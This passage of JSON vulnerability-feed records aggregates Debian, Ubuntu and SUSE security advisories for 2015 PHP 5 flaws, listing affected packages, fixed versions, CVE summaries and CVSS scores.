"php5-tidy_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-tidy", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-pgsql_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-imap_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-imap", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-mcrypt_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-mcrypt", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-ldap_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-mysqlnd_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-mysqlnd", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "libapache2-mod-php5_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "libapache2-mod-php5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-cli_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-cli", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-fpm_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-fpm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-odbc_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-odbc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-sqlite_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-sqlite", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "libapache2-mod-php5filter_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "libapache2-mod-php5filter", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-cgi_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-cgi", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-dbg_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-intl_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-intl", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "libphp5-embed_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "libphp5-embed", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-curl_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-curl", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-pspell_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-pspell", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-common_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-common", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-recode_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-recode", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-gd_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-gd", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-sybase_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-sybase", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-xmlrpc_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-gmp_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-gmp", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-dev_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php-pear_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php-pear", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-enchant_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-enchant", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-xsl_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-xsl", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-interbase_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-interbase", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-snmp_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-snmp", "operator": "lt"}], "edition": 1, "description": "Multiple vulnerabilities have been discovered in the PHP language:\n\n * [CVE-2015-2301](<https://security-tracker.debian.org/tracker/CVE-2015-2301>)\n\nUse-after-free in the phar extension.\n\n * [CVE-2015-2331](<https://security-tracker.debian.org/tracker/CVE-2015-2331>)\n\nEmmanuel Law discovered an integer overflow in the processing of ZIP archives, resulting in denial of service or potentially the execution of arbitrary code.\n\nFor the stable distribution (wheezy), these problems have been fixed in version 5.4.39-0+deb7u1. This update also fixes a regression in the curl support introduced in DSA 3195.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your php5 packages.", "reporter": "Debian", "published": "2015-03-20T00:00:00", "type": "debian", "title": "php5 -- security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-2348", "CVE-2015-2787", "CVE-2015-2301", "CVE-2015-2331"], "modified": "2015-03-20T00:00:00", "id": "DSA-3198", "href": "http://www.debian.org/security/dsa-3198", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T12:56:46", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "6", "packageVersion": "5.3.3.1-7+squeeze26", "arch": "all", "packageFilename": "php5_5.3.3.1-7+squeeze26_all.deb", "packageName": "php5", "operator": "lt"}], "description": "* [CVE-2014-9705](<https://security-tracker.debian.org/tracker/CVE-2014-9705>)\n\nHeap-based buffer overflow in the enchant_broker_request_dict function in ext/enchant/enchant.c in PHP before 5.4.38, 5.5.x before 5.5.22, and 5.6.x before 5.6.6 allows remote attackers to execute arbitrary code via vectors that trigger creation of multiple dictionaries.\n\n * [CVE-2015-0232](<https://security-tracker.debian.org/tracker/CVE-2015-0232>)\n\nThe exif_process_unicode function in ext/exif/exif.c in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized pointer free and application crash) via crafted EXIF data in a JPEG image.\n\n * [CVE-2015-2301](<https://security-tracker.debian.org/tracker/CVE-2015-2301>)\n\nUse-after-free vulnerability in the phar_rename_archive function in phar_object.c in PHP before 5.5.22 and 5.6.x before 5.6.6 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger an attempted renaming of a Phar archive to the name of an existing file.\n\n * [CVE-2015-2331](<https://security-tracker.debian.org/tracker/CVE-2015-2331>)\n\nInteger overflow in the _zip_cdir_new function in zip_dirent.c in libzip 0.11.2 and earlier, as used in the ZIP extension in PHP before 5.4.39, 5.5.x before 5.5.23, and 5.6.x before 5.6.7 and other products, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a ZIP archive that contains many entries, leading to a heap-based buffer overflow.\n\n * [CVE-2015-2783](<https://security-tracker.debian.org/tracker/CVE-2015-2783>)\n\nBuffer Over-read in unserialize when parsing Phar\n\n * [CVE-2015-2787](<https://security-tracker.debian.org/tracker/CVE-2015-2787>)\n\nUse-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.39, 5.5.x before 5.5.23, and 5.6.x before 5.6.7 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages use of the unset function within an __wakeup function, a related issue to [CVE-2015-0231](<https://security-tracker.debian.org/tracker/CVE-2015-0231>).\n\n * [CVE-2015-3329](<https://security-tracker.debian.org/tracker/CVE-2015-3329>)\n\nBuffer Overflow when parsing tar/zip/phar in phar_set_inode\n\n * [CVE-2015-3330](<https://security-tracker.debian.org/tracker/CVE-2015-3330>)\n\nPHP potential remote code execution with apache 2.4 apache2handler\n\n * CVE-2015-temp-68819 \n\nDenial of service when processing a crafted file with Fileinfo", "edition": 1, "reporter": "Debian", "published": "2015-04-29T00:00:00", "title": "php5 -- LTS security update", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-2301", "CVE-2015-2331"], "modified": "2015-04-29T00:00:00", "id": "DLA-212", "href": "http://www.debian.org/security/2015/dla-212", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:10:08", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2015-2787", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-3330", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-3329", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-2348", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-2783", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-2305"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "14.10", "packageVersion": "5.5.12+dfsg-2ubuntu4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.10", "packageVersion": "5.5.12+dfsg-2ubuntu4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "5.3.2-1ubuntu4.30", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cgi", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "5.5.9+dfsg-1ubuntu4.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cgi", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "5.3.10-1ubuntu3.18", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-fpm", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.10", "packageVersion": "5.5.12+dfsg-2ubuntu4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cgi", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "5.5.9+dfsg-1ubuntu4.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "5.3.10-1ubuntu3.18", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "5.5.9+dfsg-1ubuntu4.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "5.3.10-1ubuntu3.18", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cgi", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "5.5.9+dfsg-1ubuntu4.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-fpm", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "5.3.2-1ubuntu4.30", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "5.3.10-1ubuntu3.18", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "5.3.2-1ubuntu4.30", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.10", "packageVersion": "5.5.12+dfsg-2ubuntu4.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-fpm", "operator": "lt"}], "description": "It was discovered that PHP incorrectly handled cleanup when used with Apache 2.4. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2015-3330)\n\nIt was discovered that PHP incorrectly handled opening tar, zip or phar archives through the PHAR extension. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2015-3329)\n\nIt was discovered that PHP incorrectly handled regular expressions. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2015-2305)\n\nPaulos Yibelo discovered that PHP incorrectly handled moving files when a pathname contained a null character. A remote attacker could use this issue to possibly bypass filename restrictions. This issue only applied to Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-2348)\n\nIt was discovered that PHP incorrectly handled unserializing PHAR files. A remote attacker could use this issue to cause PHP to possibly expose sensitive information. (CVE-2015-2783)\n\nTaoguang Chen discovered that PHP incorrectly handled unserializing certain objects. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2015-2787)", "edition": 3, "reporter": "Ubuntu", "published": "2015-04-20T00:00:00", "title": "PHP vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-2348", "CVE-2015-2787", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-2305"], "modified": "2015-04-20T00:00:00", "id": "USN-2572-1", "href": "https://usn.ubuntu.com/2572-1/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T12:37:53", "references": ["https://bugzilla.suse.com/924972", "https://bugzilla.suse.com/922022", "https://bugzilla.suse.com/925109", "https://bugzilla.suse.com/923946", "https://bugzilla.suse.com/928511", "https://bugzilla.suse.com/924970", "https://bugzilla.suse.com/922452", "https://bugzilla.suse.com/928506", "https://bugzilla.suse.com/922451", "https://bugzilla.suse.com/928408"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-zip-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-zip", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-fastcgi-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-fastcgi-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-sqlite-5.5.14-22.1.x86_64.rpm", "packageName": "php5-sqlite", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-json-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-json", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-bcmath-5.5.14-22.1.x86_64.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-zlib-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-zlib-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-json-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-json-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-devel-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-enchant-5.5.14-22.1.s390x.rpm", "packageName": "php5-enchant", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-bz2-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-bz2-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-calendar-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-calendar", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-sockets-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-sockets-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-sysvsem-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-sysvsem-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-zip-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-zip-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-pcntl-5.5.14-22.1.s390x.rpm", "packageName": "php5-pcntl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-openssl-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-openssl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-devel-5.5.14-22.1.s390x.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-debugsource-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-bcmath-5.5.14-22.1.s390x.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-xmlrpc-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-xmlrpc-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-sqlite-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-sqlite-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-xmlrpc-5.5.14-22.1.s390x.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "noarch", "packageFilename": "php5-pear-5.5.14-22.1.noarch.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-ldap-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-ldap-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-pdo-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-pdo-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-ldap-5.5.14-22.1.s390x.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-5.5.14-22.1.x86_64.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-enchant-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-enchant-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-fpm-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-fpm-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-xsl-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-xsl-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-sysvshm-5.5.14-22.1.x86_64.rpm", "packageName": "php5-sysvshm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-calendar-5.5.14-22.1.s390x.rpm", "packageName": "php5-calendar", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-mcrypt-5.5.14-22.1.s390x.rpm", "packageName": "php5-mcrypt", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-sockets-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-sockets", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-snmp-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-snmp-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-snmp-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-snmp-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-sysvshm-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-sysvshm-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-debugsource-5.5.14-22.1.x86_64.rpm", "packageName": "php5-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-odbc-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-odbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "s390x", "packageFilename": "php5-soap-debuginfo-5.5.14-22.1.s390x.rpm", "packageName": "php5-soap-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-sysvshm-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-sysvshm-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-ftp-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-ftp-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-mysql-5.5.14-22.1.x86_64.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-pdo-debuginfo-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-pdo-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-intl-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-intl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "x86_64", "packageFilename": "php5-iconv-debuginfo-5.5.14-22.1.x86_64.rpm", "packageName": "php5-iconv-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-bcmath-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", "arch": "ppc64le", "packageFilename": "php5-fpm-5.5.14-22.1.ppc64le.rpm", "packageName": "php5-fpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Web Scripting", "OSVersion": "12", "packageVersion": "5.5.14-22.1", 